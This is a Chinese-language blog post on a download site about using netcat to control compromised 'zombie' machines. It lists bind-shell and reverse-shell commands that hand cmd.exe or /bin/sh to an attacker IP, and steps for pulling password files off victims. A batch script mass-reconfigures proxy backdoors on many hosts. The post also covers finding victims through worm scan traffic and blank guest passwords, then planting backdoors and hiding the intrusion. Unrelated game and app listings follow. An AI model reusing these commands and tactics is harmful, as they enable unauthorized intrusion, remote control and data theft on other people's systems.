nc.exe高级技巧应用汇总

windows
蓝点 2.19万+
0. 写在前面的话1. Netcat 1.10 for NT - nc11nt.zip,原始英文信息2. Netcat 1.10 for NT 帮助信息3. Netcat 1.10 常用的命令格式4. 管理肉鸡,更改肉鸡设置5. 下载连接6. 后记######################################################################0. 写在前面的话######################################################################最近工作比较空闲,老是想着怎么自动telnet肉鸡,自动执行命令。来管理自己的肉鸡。自己写一个程序。功底是不够的,所以只有看了看nc的帮助信息,虽然只看了个半懂,但是借助于金山词霸2002版本, 还是明白了一点东西.我觉的有必要再总结一下.反正主要是满足我自己的需要.######################################################################1. Netcat 1.10 for NT - nc11nt.zip######################################################################Basic Features* Outbound or inbound connections, TCP or UDP, to or from any ports* Full DNS forward/reverse checking, with appropriate warnings* Ability to use any local source port* Ability to use any locally-configured network source address* Built-in port-scanning capabilities, with randomizer* Can read command line arguments from standard inputb* Slow-send mode, one line every N seconds* Hex dump of transmitted and received data* Ability to let another program service establishedconnections* Telnet-options responderNew for NT* Ability to run in the background without a console window* Ability to restart as a single-threaded server to handle a newconnection________________________________________________________________________Some of the features of netcat are: Outbound or inbound connections, TCP or UDP, to or from any ports Full DNS forward/reverse checking, with appropriate warnings Ability to use any local source port Ability to use any locally-configured network source address Built-in port-scanning capabilities, with randomizer Built-in loose source-routing capability Can read command line arguments from standard input Slow-send mode, one line every N seconds Optional ability to let another program service inbound connections Some of the potential uses of netcat: Script backends Scanning ports and inventorying services Backup handlers File transfers Server testing and simulation Firewall testing Proxy gatewaying Network performance testing Address spoofing tests Protecting X servers 1001 other uses you`ll likely come up with Netcat + Encryption = Cryptcat对比win2000微软的telnet.exe和微软的tlntsvr.exe服务,连接的时候就可以看出来了.1.1 NC.EXE是一个非标准的telnet客户端程序,1.2 还有一个putty.exe客户端程序,提供四种连接模式-raw -telnet -rlogin -ssh.######################################################################2. Netcat 1.10 for NT 帮助信息######################################################################C:\WINDOWS\Desktop>nc -h[v1.10 NT]connect to somewhere: nc [-options] hostname port[s] [ports] ...listen for inbound: nc -l -p port [options] [hostname] [port]options:-d detach from console, background mode (后台模式)-e prog inbound program to exec [dangerous!!]-g gateway source-routing hop point[s], up to 8-G num source-routing pointer: 4, 8, 12, ...-h this cruft (本帮助信息)-i secs delay interval for lines sent, ports scanned (延迟时间)-l listen mode, for inbound connects (监听模式,等待连接)-L listen harder, re-listen on socket close (连接关闭后,仍然继续监听)-n numeric-only IP addresses, no DNS (ip数字模式,非dns解析)-o file hex dump of traffic (十六进制模式输出文件,三段) -p port local port number (本地端口)-r randomize local and remote ports (随机本地远程端口)-s addr local source address (本地源地址)-t answer TELNET negotiation-u UDP mode-v verbose [use twice to be more verbose] (-vv 更多信息)-w secs timeout for connects and final net reads-z zero-I/O mode [used for scanning] (扫描模式,-vv)port numbers can be individual or ranges: m-n [inclusive]######################################################################3. Netcat 1.10 常用的命令格式######################################################################下面引用 《沉睡不醒 10月15日凌晨》的文章的部分。3.1.端口的刺探:nc -vv ip portRIVER [192.168.0.198] 19190 (?) open //显示是否开放open3.2.扫描器nc -vv -w 5 ip port-port portnc -vv -z ip port-port port这样扫描会留下大量的痕迹,系统管理员会额外小心3.3. 后门victim machine: //受害者的机器nc -l -p port -e cmd.exe //win2000nc -l -p port -e /bin/sh //unix,linuxattacker machine: //攻击者的机器.nc ip -p port //连接victim_IP,然后得到一个shell。3.4.反向连接attacker machine: //一般是sql2.exe,远程溢出,webdavx3.exe攻击.//或者wollf的反向连接.nc -vv -l -p port victim machine:nc -e cmd.exe attacker ip -p portnc -e /bin/sh attacker ip -p port或者:attacker machine:nc -vv -l -p port1 /*用于输入*/nc -vv -l -p prot2 /*用于显示*/victim machine:nc attacker_ip port1 | cmd.exe | nc attacker_ip port2nc attacker_ip port1 | /bin/sh | nc attacker_ip port2139要加参数-s(nc.exe -L -p 139 -d -e cmd.exe -s 对方机器IP)这样就可以保证nc.exe优先于NETBIOS。 3.5.传送文件:3.5.1 attacker machine <-- victim machine //从肉鸡拖密码文件回来.nc -d -l -p port < path\filedest     /*attacker machine*/ 可以shell执行nc -vv attacker_ip port > path\file.txt /*victim machine*/ 需要Ctrl+C退出//肉鸡需要gui界面的cmd.exe里面执行(终端登陆,不如安装FTP方便).否则没有办法输入Crl+C.3.5.2 attacker machine --> victim machine //上传命令文件到肉鸡nc -vv -l -p port > path\file.txt      /*victim machine*/ 需要Ctrl+C退出nc -d victim_ip port < path\filedest   /*attacker machine*/ 可以shell执行//这样比较好.我们登陆终端.入侵其他的肉鸡.可以选择shell模式登陆.结论: 可以传输ascii,bin文件.可以传输程序文件.问题:连接某个ip后,传送完成后,需要发送Ctrl+C退出nc.exe .或者只有再次连接使用pskill.exe 杀掉进程.但是是否释放传输文件打开的句柄了?3.6 端口数据抓包.nc -vv -w 2 -o test.txt www.xfocus.net 80 21-15< 00000058 35 30 30 20 53 79 6e 74 61 78 20 65 72 72 6f 72 # 500 Syntax error< 00000068 2c 20 63 6f 6d 6d 61 6e 64 20 22 22 20 75 6e 72 # , command "" unr< 00000078 65 63 6f 67 6e 69 7a 65 64 2e 0d 0a # ecognized...< 00000084 83 00 00 01 8f # .....3.7 telnet,自动批处理。 ★★★★★我要重点推荐的东西就是这个.nc victim_ip port < path\file.cmd   /*victim machine*/ 显示执行过程.nc -vv victim_ip port < path\file.cmd   /*victim machine*/ 显示执行过程.nc -d victim_ip port < path\file.cmd 安静模式._______________file.cmd________________________passwordcd %windir%echo []=[%windir%]c:cd \md testcd /d %windir%\system32\net stop sksockserversnake.exe -config port 11111net start sksockserverexit_______________file.cmd__END___________________######################################################################4. 管理肉鸡,更改肉鸡设置######################################################################4.1 比如要统一更改肉鸡上面的代理端口.snake.exe 修改为11111 服务名称"sksockserver"使用winshell后门. 端口1234 密码password命令格式就是modi.bat youip.txt___________modi.bat____________________________@if "%1"=="" echo Error: no ip.txt &&goto END:start@echo password >a.cmd@echo s >>a.cmd@echo cd /d %%windir%%\system32\ >>a.cmd@net stop "sksockserver" >>a.cmd@snake.exe -config port 11111 >>a.cmd@net start "sksockserver" >>a.cmd@exit >>a.cmd:auto@for /f "eol=; tokens=1,2" %%i in (%1) do @(nc.exe -vv -w 3 %%i 1234 < a.cmd):END___________modi.bat__END_______________________4.2@echo offcolor f0:startclsC:\nc -vv -w 3 -l -p 80>>80.txtgoto start把防火墙关掉以后运行这个批处理,会监听到许多探测U漏洞的信息,大多是三条一组--妮姆达病毒扫描你的。这样就会得到肉鸡的.虽然质量不高.但是也是一种便宜的办法.肉鸡特征:1。unicode漏洞2。guest密码为空,administrators组用户3。其他漏洞自己慢慢的爽去吧。不过,再次强调一句,不建议而且是不能破坏国内主机,上去以后将tftp.exe改名。然后用pskill干掉mmc.exe进程,之后是杀毒。做好后门以后,将guest帐号停用,以对付傻瓜扫描器######################################################################5. 下载连接######################################################################5.1 http://www.atstake.com/research/tools/network_utilities/Tool: Netcat 1.10 for Unix Version: 03.20.96 Platforms: *nixTool: Netcat 1.1 for Win 95/98/NT/2000 Version: 02.08.98 Platforms: Runs on Win 95/98/NT/2000 5.2 http://www.xfocus.net/download.php?id=320 名称: cryptcat_nt.zip 更新时间: 2002-04-05 类别: 网络工具 平台: Win9x/NT/2000 大小: 115.8K 提交: maxilaw 简介: 加密传输的nc。 5.3 http://content.443.ch/pub/security/blackhat/Networking/nc/ 国外的网站10.03.02 15:48 1305 cryptcat.txt10.03.02 15:48 245760 cryptcat_linux2.tar10.03.02 15:48 118533 cryptcat_nt.zip######################################################################6. 后记######################################################################只有明天上网,找个win2000 server登陆终端服务来测试了。我的还是破win98,没有办法哟.多试试,多想想,可能你可以用它来做更多事情——你可以参见nc110.tgz里script目录下的那些脚本,从中获得一些思路。 我这儿没有nc110.tgz压缩包。明天去google.com搜索一下。Unix 下面的命令还是不熟悉. 
我的世界地图大全
我的世界是一款超高自由度的沙盒游戏,也是目前最火的一款独立游戏。游戏中玩家自制了不少风格各异的地图以丰富了MC的游戏玩法。下面为大家带来我的世界地图大全以及地图包下载,各种精品地图将一一呈现!
2023-07-08
100层电梯第81关怎么过 第八十一关通关图文攻略
100层电梯第81关怎么过,100层电梯是一款非常有意思的益智解谜游戏,很多玩家朋友表示通不了关,所以小编今天给大家带来第八十一关通关图文攻略,不知道的玩家快来看看吧!,100层电梯第81关怎么过 第八十一关通关图文攻略
2018-02-11
逆战九州龙陵bug怎么卡?逆战九州龙陵卡bug教程
逆战已经更新最新的版本“秦始皇”版本,这个版本的最新PVE僵尸猎场第九章图“九州龙陵”,这图虽然不是很难打,但是对于手残党的人还是不容易,而且容易团灭,下面小编就给大家介绍“九州龙陵”地图个别boss卡bug方法吧,逆战九州龙陵bug怎么卡?逆战九州龙陵卡bug教程
2016-07-15
小说写作v2.0.0
小说写作软件下载-小说写作app,这是款让作者可更好的创作写小说的手机应用。小说写作app实现了小说管理、小说章节管理以及小说内容管理等服务,旨在让作者们可随时随地轻松写小说,您可以免费下载安卓手机小说写作。
2020-03-12
蚂蚁女王v3.2.4
蚂蚁女王下载-蚂蚁女王app是芜湖一休哥信息技术有限公司出品的生活服务应用,是一款专门的汽车保养记录、保险记和录查询公司的移动应用。蚂蚁女王app帮助用户便捷的管理汽车使用情况,让大家能情况的了解和获取汽车使用详情,您可以免费下载安卓手机蚂蚁女王。
2020-03-03
公开课
公开课app哪个好?现在越来越多的网站推出自己的公开课app。看世界听思想,公开课无疑是提升逼格level的好去处,那么现在有哪些可以听公开课比较的好应用APP呢?小编特意为您整理了公开课APP推荐大全,祝您学习愉快!
2023-07-08
天命奇御全武学秘籍获取方法 天命奇御武学秘籍在哪学
天命奇御这款游戏中玩家可以使用刀法、剑法、长柄、拳脚四种攻击手段,而有的玩家不知道这些武学获取方式,下面带来天命奇御全武学秘籍获取方法,一起来看看吧,天命奇御全武学秘籍获取方法 天命奇御武学秘籍在哪学
2018-08-13
赏金漫画v2.0.1
赏金漫画是一款非常好用的手机在线漫画阅读工具。海量的精彩漫画资源。种类齐全丰富,你喜欢的这里都有。全是正版资源,感兴趣的朋友不要错过了,快来下载体验吧。
2021-03-12
全网免费小说搜索破解版下载v1.2.0
全网免费小说搜索直装破解版,给您高级会员功能,全面解锁vip特权,搜索小说更加全面,去除所有应用广告,可以在线免费阅读,也可以下载到手机中离线观看。版本特性·此版本由大神蓝色飞扬破解分享,解锁全部书籍,包括福利书,去除引流广告。
2021-04-21
青云仙剑传v1.0
青云仙剑传手游iOS版是一款顶级修仙题材手游,最唯美的仙侠风格,采用了最酷炫的2D画面和丰富的游戏系统,让玩家可以享受到最具盛典的仙侠手游,丰富的游戏玩法,各种帮派战斗、骑宠和外形幻化,开启热血修仙的旅程。
2018-04-03
<123
X

今日特别推荐

本站所有内容均来自互联网分享站点所提供的公开引用资源,未提供资源上传、存储服务。 如果侵犯了您的权益,请通知我们,我们会及时删除侵权内容,谢谢合作!

抖手韩漫|实时更新|网站地图|联系我们|湘ICP备20137398107号

CopyRight © 2013-2023, All Rights Reserved. 37acg.cn